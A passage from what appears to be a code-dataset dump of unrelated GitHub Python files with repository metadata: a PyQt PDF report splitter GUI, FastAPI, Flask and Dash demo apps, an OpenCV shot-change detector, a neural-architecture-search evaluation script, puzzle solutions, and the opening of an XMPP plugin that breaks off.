Ui_ReportSplitter(object):\n filename = \"\"\n directory = \"\"\n file_type = \"\"\n\n def set_report_type(self):\n self.file_type = \"mok\"\n self.listWidget.addItem(\"file type - \" + self.file_type)\n\n def set_mok_type(self):\n self.file_type = \"report\"\n self.listWidget.addItem(\"file type - \" + self.file_type)\n\n def getFileName(self):\n self.filename, check = QFileDialog.getOpenFileName(None,\n \"Choose File\",\n \".\",\n \"PDF Files(*.pdf)\")\n if check:\n self.listWidget.addItem(\"Filename - \" + self.filename)\n\n if self.directory == \"\":\n self.listWidget.addItem(\"Please select the output folder\")\n\n\n def getDirectory(self): # <-----\n self.directory = QFileDialog.getExistingDirectory(None, \"Choose Folder\", \".\")\n\n if self.directory:\n self.listWidget.addItem(\"Output folder - \" + self.directory)\n\n def split(self): # <-----\n if self.filename == \"\":\n self.listWidget.addItem(\"Please select the main report file\")\n return\n\n if self.directory == \"\":\n self.listWidget.addItem(\"Please select the output folder\")\n return\n\n if self.file_type == \"\":\n self.listWidget.addItem(\"Please set the file type\")\n return\n print(self.file_type)\n separate_all(self.filename, self.directory, self.listWidget, self.file_type)\n\n def setupUi(self, ReportSplitter):\n ReportSplitter.setObjectName(\"ReportSplitter\")\n ReportSplitter.setWindowModality(QtCore.Qt.WindowModal)\n ReportSplitter.resize(797, 600)\n ReportSplitter.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))\n ReportSplitter.setAutoFillBackground(False)\n ReportSplitter.setStyleSheet(\"font: 8pt \\\"Noto Sans Lisu\\\";\")\n ReportSplitter.setUnifiedTitleAndToolBarOnMac(False)\n self.centralwidget = QtWidgets.QWidget(ReportSplitter)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 220, 211, 261))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setSpacing(4)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.FileButton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n self.FileButton.setStyleSheet(\"font: 75 8pt \\\"MS Shell Dlg 2\\\";\")\n self.FileButton.setObjectName(\"FileButton\")\n self.verticalLayout.addWidget(self.FileButton)\n self.FolderButton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n self.FolderButton.setStyleSheet(\"font: 75 8pt \\\"MS Shell Dlg 2\\\";\")\n self.FolderButton.setObjectName(\"FolderButton\")\n self.verticalLayout.addWidget(self.FolderButton)\n self.SplitButton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n self.SplitButton.setStyleSheet(\"font: 75 8pt \\\"MS Shell Dlg 2\\\";\")\n self.SplitButton.setObjectName(\"SplitButton\")\n self.verticalLayout.addWidget(self.SplitButton)\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(180, 0, 81, 681))\n self.line.setFrameShape(QtWidgets.QFrame.VLine)\n self.line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line.setObjectName(\"line\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(10, 10, 181, 191))\n self.label.setText(\"\")\n self.label.setPixmap(QtGui.QPixmap(\"C:\\\\FirstApplicationTest\\\\UI\\\\images/bism3.bmp\"))\n self.label.setScaledContents(True)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label.setWordWrap(False)\n self.label.setIndent(-1)\n self.label.setObjectName(\"label\")\n self.listWidget = QtWidgets.QListWidget(self.centralwidget)\n self.listWidget.setGeometry(QtCore.QRect(235, 11, 541, 551))\n self.listWidget.setFrameShadow(QtWidgets.QFrame.Plain)\n self.listWidget.setObjectName(\"listWidget\")\n item = QtWidgets.QListWidgetItem()\n self.listWidget.addItem(item)\n self.horizontalLayoutWidget = QtWidgets.QWidget(self.centralwidget)\n self.horizontalLayoutWidget.setGeometry(QtCore.QRect(0, 500, 211, 80))\n self.horizontalLayoutWidget.setObjectName(\"horizontalLayoutWidget\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.sample_1_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)\n self.sample_1_button.setObjectName(\"sample_1_button\")\n self.horizontalLayout.addWidget(self.sample_1_button)\n self.sample_2_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)\n self.sample_2_button.setObjectName(\"sample_2_button\")\n self.horizontalLayout.addWidget(self.sample_2_button)\n self.line_2 = QtWidgets.QFrame(self.centralwidget)\n self.line_2.setGeometry(QtCore.QRect(0, 470, 221, 16))\n self.line_2.setFrameShape(QtWidgets.QFrame.HLine)\n self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line_2.setObjectName(\"line_2\")\n ReportSplitter.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(ReportSplitter)\n self.statusbar.setObjectName(\"statusbar\")\n ReportSplitter.setStatusBar(self.statusbar)\n self.FolderButton_2 = QtWidgets.QAction(ReportSplitter)\n self.FolderButton_2.setCheckable(False)\n self.FolderButton_2.setObjectName(\"FolderButton_2\")\n\n self.FileButton.clicked.connect(self.getFileName)\n self.FolderButton.clicked.connect(self.getDirectory)\n self.SplitButton.clicked.connect(self.split)\n\n self.sample_1_button.clicked.connect(self.set_report_type)\n self.sample_2_button.clicked.connect(self.set_mok_type)\n\n self.retranslateUi(ReportSplitter)\n QtCore.QMetaObject.connectSlotsByName(ReportSplitter)\n\n def retranslateUi(self, ReportSplitter):\n _translate = QtCore.QCoreApplication.translate\n ReportSplitter.setWindowTitle(_translate(\"ReportSplitter\", \"Report Splitter\"))\n self.FileButton.setText(_translate(\"ReportSplitter\", \"Choose File\"))\n self.FolderButton.setText(_translate(\"ReportSplitter\", \"Choose Output Folder\"))\n self.SplitButton.setText(_translate(\"ReportSplitter\", \"Split\"))\n self.label.setToolTip(_translate(\"ReportSplitter\", \"

    \"))\n self.listWidget.setAccessibleDescription(_translate(\"ReportSplitter\", \"logs\"))\n __sortingEnabled = self.listWidget.isSortingEnabled()\n self.listWidget.setSortingEnabled(False)\n item = self.listWidget.item(0)\n item.setText(_translate(\"ReportSplitter\", \"Program started\\nPlease select the main file report(Press button: 'Choose File')\"))\n self.listWidget.setSortingEnabled(__sortingEnabled)\n\n self.sample_1_button.setText(_translate(\"ReportSplitter\", \"moks sample\"))\n self.sample_2_button.setText(_translate(\"ReportSplitter\", \"reports sample\"))\n self.FolderButton_2.setText(_translate(\"ReportSplitter\", \"Choose Folder\"))\n\n\n","repo_name":"VladislavYurev/BISM_Reports_Splitter","sub_path":"bism_app.py","file_name":"bism_app.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3339613749","text":"# asyncio, Hello World\nimport asyncio\n\n\n@asyncio.coroutine\ndef hello_world():\n while True:\n print(\"Hello World!\")\n yield from asyncio.sleep(1.0)\n\n\nif __name__ == '__main__':\n # отримуємо цикл обробки подій\n loop = asyncio.get_event_loop()\n loop.run_until_complete(hello_world())\n # закриваємо роботу з циклом подій\n loop.close()\n","repo_name":"Searge/DiveinPython","sub_path":"w_5/playground/asyncio_hw.py","file_name":"asyncio_hw.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"uk","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"10931955828","text":"from typing import Optional\n\nimport uvicorn\nfrom fastapi import FastAPI, Query, Request\n\napp = FastAPI()\n\n\n@app.get(\"/hello\")\ndef hello(request: Request, sleep_time: int = Query(None)):\n \"\"\"Can get query args not defined as params\"\"\"\n query_params = request.query_params.items()\n return query_params\n\n\n@app.get(\"/float\")\ndef float_func(float_p: Optional[float] = Query(None)):\n \"\"\"Can get query args not defined as params\"\"\"\n return float_p\n\n\n@app.get(\"/flag\")\ndef flag_func(f: Optional[str] = Query(None)):\n if f is not None:\n f = True\n else:\n f = False\n return f\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n","repo_name":"falkben/fastapi_experiments","sub_path":"experiments/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"9462887731","text":"import argparse\nimport os\n\nimport tensorflow as tf\nfrom tensorflow.keras import models\n\nimport log_service\nfrom dataset.generators.factory import dataset_generator_factory\nfrom models.generators.factory import model_generator_factory\nfrom search_space_units import CellSpecification\nfrom utils.config_utils import read_json_config\nfrom utils.nn_utils import predict_and_save_confusion_matrix, initialize_train_strategy, perform_global_memory_clear, \\\n remove_annoying_tensorflow_messages\nfrom utils.post_search_training_utils import MacroConfig, compile_post_search_model, save_evaluation_results\n\n# disable Tensorflow info and warning messages\nremove_annoying_tensorflow_messages()\n\nAUTOTUNE = tf.data.AUTOTUNE\n\n\ndef get_model_cell_spec(log_folder_path: str):\n with open(os.path.join(log_folder_path, 'cell_spec.txt'), 'r') as f:\n cell_spec = f.read()\n\n return CellSpecification.from_str(cell_spec)\n\n\n# This script can be used to evaluate the final model trained on a test set.\n# It needs a saved model, which could be the one found during search or the one produced by final_training script (spec + checkpoint)\ndef main():\n # if \"search_model\" flag is not specified, the script will assume that the final_training script has been executed to train extensively a model\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument('-p', metavar='PATH', type=str, help=\"path to log folder\", required=True)\n parser.add_argument('-j', metavar='JSON_PATH', type=str,\n help='path to config json with training parameters (used to instantiate dataset)', default=None)\n parser.add_argument('--search_model', help='use best model found in search, with weights found on proxy training', action='store_true')\n parser.add_argument('-f', metavar='MODEL_FOLDER', type=str, help='model folder name (default: final_model_training)',\n default='final_model_training')\n parser.add_argument('-b', metavar='BATCH_SIZE', type=int, help='overrides the batch size used in configuration', default=None)\n parser.add_argument('-ts', metavar='TRAIN_STRATEGY', type=str, help='device used in Tensorflow distribute strategy', default=None)\n parser.add_argument('--top', help='when -f is provided, consider it as a nested folder if this option is set. Useful for example when evaluating'\n ' all models found during model selection step.', action='store_true')\n args = parser.parse_args()\n\n model_path = os.path.join(args.p, 'best_model') if args.search_model else os.path.join(args.p, args.f)\n log_service.set_log_path(model_path)\n\n if args.j:\n custom_json_path = args.j\n else:\n custom_json_path = os.path.join(args.p, 'restore', 'run.json') if args.search_model \\\n else os.path.join(model_path, 'run.json')\n\n print('Reading configuration...')\n config = read_json_config(custom_json_path)\n # override batch size if provided\n if args.b is not None:\n config.dataset.val_test_batch_size = args.b\n\n train_config = config.training_hyperparameters\n arc_config = config.architecture_hyperparameters\n multi_output = arc_config.multi_output\n\n train_strategy = initialize_train_strategy(args.ts, config.others.use_mixed_precision)\n\n # Load and prepare the dataset\n print('Preparing datasets...')\n dataset_generator = dataset_generator_factory(config.dataset, config.others)\n test_ds, classes_count, image_shape, test_batches = dataset_generator.generate_test_dataset()\n print('Datasets generated successfully')\n\n # Generate the model\n if args.search_model:\n with train_strategy.scope():\n model = models.load_model(os.path.join(args.p, 'best_model', 'tf_model'))\n print('Model loaded successfully from TF model files')\n save_evaluation_results(model, test_ds, model_path)\n\n # create confusion matrix only in classification tasks\n if config.dataset.type in ['image_classification', 'time_series_classification']:\n predict_and_save_confusion_matrix(model, test_ds, multi_output, n_classes=classes_count,\n save_path=os.path.join(model_path, 'test_confusion_matrix'))\n else:\n with train_strategy.scope():\n model_gen = model_generator_factory(config.dataset, train_config, arc_config, test_batches,\n output_classes_count=classes_count, input_shape=image_shape, data_augmentation_model=None)\n\n model_paths = [f.path for f in os.scandir(model_path) if f.is_dir()] if args.top else [model_path]\n for m_index, m_path in enumerate(model_paths):\n print(f'Processing model at \"{m_path}\"')\n\n cell_spec = get_model_cell_spec(m_path)\n print('Cell specification:')\n for i, block in enumerate(cell_spec):\n print(f'Block {i + 1}: {block}')\n\n print('Generating Keras model from cell specification...')\n\n # read model configuration to extract its macro architecture parameters\n model_config = read_json_config(os.path.join(m_path, 'run.json'))\n macro = MacroConfig.from_config(model_config)\n\n with train_strategy.scope():\n model_gen.alter_macro_structure(*macro)\n mo_model, _ = model_gen.build_model(cell_spec, add_imagenet_stem=False)\n # add separate IoU in evaluation of segmentation models\n extra_metrics = [tf.keras.metrics.IoU(classes_count, target_class_ids=[i], ignore_class=255, sparse_y_pred=False)\n for i in range(classes_count)] if config.dataset.type == 'image_segmentation' else None\n model, _ = compile_post_search_model(mo_model, model_gen, train_strategy,\n enable_xla=config.others.enable_XLA_compilation, extra_metrics=extra_metrics)\n\n print('Model generated successfully')\n\n latest = tf.train.latest_checkpoint(os.path.join(m_path, 'weights'))\n model.load_weights(latest)\n print('Weights loaded successfully from checkpoint')\n\n save_evaluation_results(model, test_ds, m_path)\n # create confusion matrix only in classification tasks\n if config.dataset.type in ['image_classification', 'time_series_classification']:\n predict_and_save_confusion_matrix(model, test_ds, multi_output, n_classes=classes_count,\n save_path=os.path.join(m_path, 'test_confusion_matrix'))\n\n perform_global_memory_clear()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AndreaFalanti/popnas","sub_path":"src/scripts/evaluate_network.py","file_name":"evaluate_network.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"18454113200","text":"from flask import Flask\nfrom flask_restful import Api,Resource,request\nfrom rsystem import return_r\n\napp = Flask(__name__)\napi = Api(app)\nclass Api(Resource):\n def get(self): \n arg = request.args.get(\"name\")\n print(arg, \"arg----------------\")\n data = return_r(movies=arg)\n print(data, \"data----------------\") \n return {\"data\": list(dict(data).keys())}\n\napi.add_resource(Api, \"/rmovies\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Vinaypatil-Ev/movie-recommender-system","sub_path":"rs/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"353522933","text":"import random\nN = 300000\ns = 0\na = -3\nb = 3\nstep = (b-a)/N\nfor i in range(1, N+1):\n st = random.uniform(a, b)\n if st > 2 or st < -2: continue\n s += -1*(st)**2+4\ns *= (b-a)/N\nprint(s)","repo_name":"alekseik1/python_mipt_study","sub_path":"1sem/lesson_6/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"74702382438","text":"import random\nfrom scipy.stats import norm\n\n\ndef instantiate_and_solve(constructor, semantle):\n solver = constructor()\n target, steps = solver.solve(semantle)\n return steps\n \n\ndef run_trial(nullary_constructor, semantle, n=10, target_pool=None, cartesian=False, tick=10):\n obs = []\n targets = []\n for i in range(n):\n all_targets = [semantle.target]\n if target_pool is not None:\n all_targets = [random.choice(target_pool)] if not cartesian else target_pool\n for t in all_targets:\n semantle.target = t\n steps = instantiate_and_solve(nullary_constructor, semantle)\n obs.append(steps)\n targets.append(t)\n if tick is not None and i % tick == 0:\n print('.', end='')\n return obs, targets\n \n \ndef run_sweep(unary_constructor, values, semantle, n=10, target_pool=None, cartesian=False):\n results = []\n for v in values:\n trial = run_trial(lambda: unary_constructor(v), semantle, n, target_pool, cartesian)\n results.append(trial)\n return results\n \n \ndef sweep_norm(results):\n mu_std = [norm.fit(trials) for trials in results]\n return list(zip(*mu_std))\n \n \ndef compare(a, b, semantle, n=20):\n norm_a = norm.fit(run_trial(a, semantle, n))\n norm_b = norm.fit(run_trial(b, semantle, n))\n return norm_a, norm_b\n \n \ndef delta(test, base, semantle, n=20):\n comparison = compare(test, base, semantle, n)\n return comparison[1][0] - comparison[0][0]","repo_name":"safetydave/semantic","sub_path":"src/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37303432704","text":"M1 = 10 ** 9 + 7\nM2 = 10 ** 9 + 33\np1 = 10 ** 9 + 9\np2 = 10 ** 9 + 87\npw1 = [1] * 10\npw2 = [1] * 10\nfor i in range(1, 10):\n pw1[i] = p1 * pw1[i - 1]\n pw2[i] = p2 * pw2[i - 1]\n pw1[i] %= M1\n pw2[i] %= M2\n\nclass Solution:\n def find(self, num, i, n, ctr, fhash, shash, tight, curr):\n if i >= n:\n if tight or ctr[0] > 0:\n return float('inf')\n for d in range(1, 10):\n if ctr[d] > 0 and ctr[d] != d:\n return float('inf')\n return curr\n key = (i, fhash, shash, tight)\n if key in self.cache:\n return self.cache[key]\n mindigit = 0\n if tight:\n mindigit = int(num[i])\n for d in range(mindigit, 10):\n if ctr[d] == d:\n continue\n ctr[d] += 1\n cres = self.find(num, i + 1, n, ctr, (fhash + d * pw1[d]) % M1, (shash + d * pw2[d]) % M2, tight and d == mindigit, 10 * curr + d)\n if cres < float('inf'):\n self.cache[key] = cres\n return cres\n ctr[d] -= 1\n self.cache[key] = float('inf')\n return float('inf')\n \n def nextBeautifulNumber(self, n: int) -> int:\n self.cache = {}\n a = self.find(str(n), 0, len(str(n)), [0] * 10, 0, 0, True, 0)\n self.cache = {}\n b = self.find(str(10 ** len(str(n))), 0, len(str(10 ** len(str(n)))), [0] * 10, 0, 0, True, 0)\n return min(a, b)","repo_name":"theabbie/leetcode","sub_path":"next-greater-numerically-balanced-number.py","file_name":"next-greater-numerically-balanced-number.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"16773304362","text":"\"\"\"Tabler.\"\"\"\n\n__title__ = \"tabler\"\n__description__ = \"Simple interface for tabulated data and .csv files\"\n__url__ = \"http://github.com/lukeshiner/tabler.git\"\n__version__ = \"2.5.0\"\n__author__ = \"Luke Shiner\"\n__author_email__ = \"luke@lukeshiner.com\"\n__license__ = \"MIT\"\n__copyright__ = \"Copyright 2018 Luke Shiner\"\n","repo_name":"lukeshiner/tabler","sub_path":"tabler/__version__.py","file_name":"__version__.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29921088163","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nBasic dash application to explore the errors of the Pix2Pix network depending on input and tide conditions.\n\nCreated on Tue Jun 14 13:18:31 2022\n\n@author: Aurelien Callens\n\"\"\"\nimport pickle\nimport bz2file as bz2\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objs as go\nfrom plotly.subplots import make_subplots\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash import Dash\nfrom dash.dependencies import Output, Input\n\ndef color_vec(df, i):\n vec = np.repeat('blue', len(df))\n vec[i] = 'red'\n return(vec)\n\ndata = bz2.BZ2File('df.pbz2', 'rb')\ndf = pickle.load(data)\n\napp = Dash(__name__)\nserver = app.server\n\napp.layout = html.Div([\n html.H1(children=\"Absolute error analysis\", style={'textAlign': 'center'}),\n html.Div([\n html.Div([\n dcc.Dropdown(id='bathy',\n options=[{'label': i, 'value': i} for i in df['bathy'].unique()],\n value='2017-03-27'),\n dcc.Slider(id='slider_i',\n value=0,\n min=0,\n tooltip={\"placement\": \"bottom\", \"always_visible\": True})\n ],style={'width': '60%', 'margin':'auto', 'justify-content': 'center'})\n ]),\n html.H3([html.P(id='metrics')], style=dict(display='flex', justifyContent='center')),\n html.Div(dcc.Graph(id='plotly'), style={'width': '100%', 'display': 'inline-block', 'align-items': 'center', 'justify-content': 'center'})\n ])\n\n@app.callback(\n Output('slider_i', component_property='max'),\n Input('bathy', 'value')\n)\ndef update_slider(bathy):\n dff = df[df['bathy'] == str(bathy)].reset_index()\n return len(dff)-1\n\n@app.callback(\n Output('plotly', 'figure'),\n Input('bathy', 'value'),\n Input('slider_i', 'value'),)\ndef update_graph(bathy, index):\n dff = df[df['bathy'] == str(bathy)].reset_index()\n\n i = int(index)\n\n fig = make_subplots(2, 3,\n subplot_titles=('Snap Input', 'Timex Input', 'Tide level', \n 'True Bathy', 'Pred. Bathy', 'Absolute error map'))\n\n _vmin, _vmax = np.min(dff['true'][i])-1, np.max(dff['true'][i])+1\n\n fig.add_trace(\n go.Heatmap(z=dff['input'][i][:,:,0], colorscale='gray', showscale=False), row=1, col=1)\n\n fig.add_trace(\n go.Heatmap(z=dff['input'][i][:,:,1], colorscale='gray', showscale=False), row=1, col=2)\n\n fig.add_trace(\n go.Scatter(mode='markers', x=dff['Date'], y=dff['Tide'], marker=dict(size=10, color=color_vec(dff,i))), row=1, col=3)\n\n fig.add_trace(\n go.Heatmap(z=dff['true'][i].squeeze(), colorscale='jet', colorbar=dict(x=0.29, y=0.2, len=.4), zmin=_vmin, zmax=_vmax), row=2, col=1)\n\n fig.add_trace(\n go.Heatmap(z=dff['pred'][i], colorscale='jet', colorbar=dict(x=0.645, y=0.2, len=.4) , zmin=_vmin, zmax=_vmax), row=2, col=2)\n\n fig.add_trace(\n go.Heatmap(z=dff['Err'][i], colorscale='inferno', colorbar=dict(x=1, y=0.2, len=.4)), row=2, col=3)\n fig.update_layout(plot_bgcolor = \"white\", transition_duration=10)\n fig.update_layout(autosize=True, height=1000)\n return fig\n\n\n\n@app.callback(\n Output('metrics', 'children'),\n Input('bathy', 'value'),\n Input('slider_i', 'value'),)\ndef update_metric(bathy, index):\n dff = df[df['bathy'] == str(bathy)].reset_index()\n\n i = int(index)\n\n sentence = 'RSME: {rmse:.2f}, MAE: {mae:.2f}'.format(rmse=dff['rmse'][i], mae=dff['mae'][i])\n return sentence\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"AurelienCallens/Dash_app_MAE","sub_path":"app_dash.py","file_name":"app_dash.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5755672296","text":"import cv2\nimport numpy as np\nimport os\nfrom datetime import datetime,timedelta\n\ncv2_maj_ver = cv2.__version__.split('.')[0]\nif cv2_maj_ver == '2':\n HISTCMPOPTION = cv2.cv.CV_COMP_BHATTACHARYYA\nelse:\n HISTCMPOPTION = cv2.HISTCMP_BHATTACHARYYA\n\n\nclass ShotChangeHist:\n def __init__(self,fps, vidLen):\n self.fps = fps\n self.vidLen = vidLen\n pass\n\n @staticmethod\n def getHistFeatures(frame):\n histFeats = []\n feat = ShotChangeHist.calcHistFeatOfImage(frame, bool_inputrgb=False)\n return feat\n\n @staticmethod\n def calcHistFeatOfImage(img, bool_inputrgb=False):\n tmp = cv2.resize(img, (120, 90))\n if bool_inputrgb:\n rgb_image = tmp\n else:\n rgb_image = cv2.cvtColor(tmp, cv2.COLOR_BGR2RGB)\n\n return HistCalculate.calculateHist(rgb_image)\n\n def getDistanceArr(self, histFeats, timestamps):\n distArr = []\n stepCount = 10\n \n\n for index in range(len(histFeats)):\n tempObj = {}\n tempObj[index] = []\n \n for j in range(1, stepCount):\n if index-j >= 0:\n tempObj[index].append(HistCalculate.calculateHistDistance(histFeats[index], histFeats[index-j]))\n else:\n break\n\n distArr.append(tempObj)\n\n print(distArr)\n\n return distArr\n\n def _getShotChange(self, arr):\n shotChange = []\n arrLen = len(arr)\n assignedArr = [0]*arrLen\n\n # Threshold value of min 0.25 to detect change\n for i in range(arrLen):\n if len(arr[i]) > 0:\n for (key, value) in (arr[i]).items():\n # print(value)\n value = np.array(value)\n if len(value[value < 0.035]):\n assignedArr[i] = 1\n\n for index in range(arrLen):\n shotChange.append(index) if assignedArr[index] == 0 else None\n\n shotChange = sorted(shotChange)\n\n return shotChange\n\n\n def obtainShotChanges(self, histFeats, timestamps):\n distArr = self.getDistanceArr(histFeats, timestamps)\n # print(len(distArr), distArr)\n totalChanges = self._getShotChange(distArr)\n print(totalChanges)\n\n shotChangepts = []\n\n for item in totalChanges:\n shotChangepts.append(timestamps[item])\n\n return totalChanges, shotChangepts\n\nclass HistCalculate:\n @staticmethod\n def calculateHist(rgb_image):\n\n # extract a 3D RGB color histogram from the image,\n # using 8 bins per channel, normalize, and update\n # the index\n hist = cv2.calcHist([rgb_image], [0, 1, 2], None, [8, 8, 8], [0, 256, 0, 256, 0, 256])\n hist = cv2.normalize(hist, hist).flatten() # Size=8x8x8 = 512 distinct values\n return hist\n\n\n @staticmethod\n def calculateHistDistance(prevHist, nextHist):\n distance = cv2.compareHist(prevHist, nextHist, HISTCMPOPTION)\n return distance\n\n\nif __name__ == '__main__':\n # print(\"hello\n shotChange = ShotChangeHist(30, None)\n\n capture = cv2.VideoCapture(\"people.mp4\")\n print(shotChange)\n\n histFeats = []\n timeStamps = []\n\n # OUTPUT_FILE = \"people.mp4\"\n frame_cnt = 0\n timestamp = datetime.now()\n\n while(True):\n # print(\"here\")\n ret, frame = capture.read()\n\n if ret:\n timestamp = timestamp + timedelta(seconds = 1)\n feat = shotChange.getHistFeatures(frame)\n # out.write(frame)\n # if utils.getChanges(frame, prev):\n # active = active + 1\n # change_frames.append(frame_cnt)\n if frame_cnt > 40 and frame_cnt < 100:\n cv2.imwrite(\"output/frame_\" + str(frame_cnt) + '.jpg', frame)\n\n if frame_cnt > 100:\n break\n if frame_cnt % 30 == 0 and frame_cnt != 0:\n if frame_cnt/30 == 2:\n changes, ts = shotChange.obtainShotChanges(histFeats, timeStamps)\n changes = [x + frame_cnt - 10 for x in changes]\n print(\"############\",changes, frame_cnt/30)\n\n histFeats = histFeats[-11:-1] + [feat]\n timeStamps = timeStamps[-11:-1] + [timestamp]\n else:\n histFeats.append(feat)\n timeStamps.append(timestamp)\n\n else:\n break\n\n frame_cnt = frame_cnt + 1","repo_name":"varshasachan/China-Machine-Camera-","sub_path":"videorecorder/cv_utils.py","file_name":"cv_utils.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18463046613","text":"\"\"\"8.\tFaça um programa que pergunte o preço de três produtos e informe qual produto você deve comprar, sabendo que a\ndecisão é sempre pelo mais barato.\n\"\"\"\nfrom Ext_Decisao.Menor import menor_valor\npreco = []\ni = 0\nwhile i < 3:\n i += 1\n preco.append(float(input(\"Digite o preço do primeiro produto: \")))\n\nposicao = menor_valor(preco)\n\nprint(\"Você deve comprar o \", posicao + 1, \"produto que custa R$\", preco[posicao])\n","repo_name":"chrismol2004/MOL","sub_path":"Ext_Decisao/Parte1/L8.py","file_name":"L8.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31710804343","text":"# 4 00:59:51 15808 0 01:11:22 15681 0\n\nfrom aocd.models import Puzzle\nfrom aocd import submit\nimport time\n\nYEAR = int('2022')\nDAY = int('04')\n\ndef parse_input():\n puzzle = Puzzle(day=DAY, year=YEAR)\n indata = puzzle.input_data.split('\\n')\n return indata\n\n\ndef part1(indata):\n score = 0\n for row in indata:\n a, b = row.split(',')\n a0, a1 = [int(x) for x in a.split('-')]\n b0, b1 = [int(x) for x in b.split('-')]\n if (a0 <= b0 and b1 <= a1) or (b0 <= a0 and a1 <= b1):\n score += 1\n\n return score\n\n\ndef part2(indata):\n score = 0\n for row in indata:\n a, b = row.split(',')\n a0, a1 = [int(x) for x in a.split('-')]\n b0, b1 = [int(x) for x in b.split('-')]\n if not (a1 < b0 or b1 < a0):\n score += 1\n\n return score\n\n\nif __name__ == \"__main__\":\n indata = parse_input()\n t0 = time.time()\n\n part1_answer = part1(indata)\n print(\"\\npart1:\", part1_answer)\n submit(part1_answer, part=\"a\", day=DAY, year=YEAR)\n\n part2_answer = part2(indata)\n print(\"\\npart2:\", part2_answer)\n submit(part2_answer, part=\"b\", day=DAY, year=YEAR)\n\n print(\"\\ntime:\", time.time()-t0)\n","repo_name":"badboj40/advent-of-code","sub_path":"2022/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"44353737088","text":"# -*- coding: utf-8 -*-\n#\n# (c) 2016 siveo, http://www.siveo.net\n#\n# This file is part of Pulse 2, http://www.siveo.net\n#\n# Pulse 2 is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# Pulse 2 is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Pulse 2; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# file pluginsmaster/plugin_loadreconf.py\n\nimport json\nimport os\nimport logging\nfrom mmc.plugins.xmppmaster.master.lib.utils import getRandomName\nimport types\nimport ConfigParser\nfrom pulse2.database.xmppmaster import XmppMasterDatabase\nfrom sleekxmpp import jid\nimport time\n\nlogger = logging.getLogger()\nDEBUGPULSEPLUGIN = 25\n\n# this plugin calling to starting agent\n\nplugin = {\"VERSION\" : \"1.0\", \"NAME\" : \"loadreconf\", \"TYPE\" : \"master\"}\n\ndef action( objectxmpp, action, sessionid, data, msg, dataerreur):\n logger.debug(\"=====================================================\")\n logger.debug(\"call %s from %s\"%(plugin, 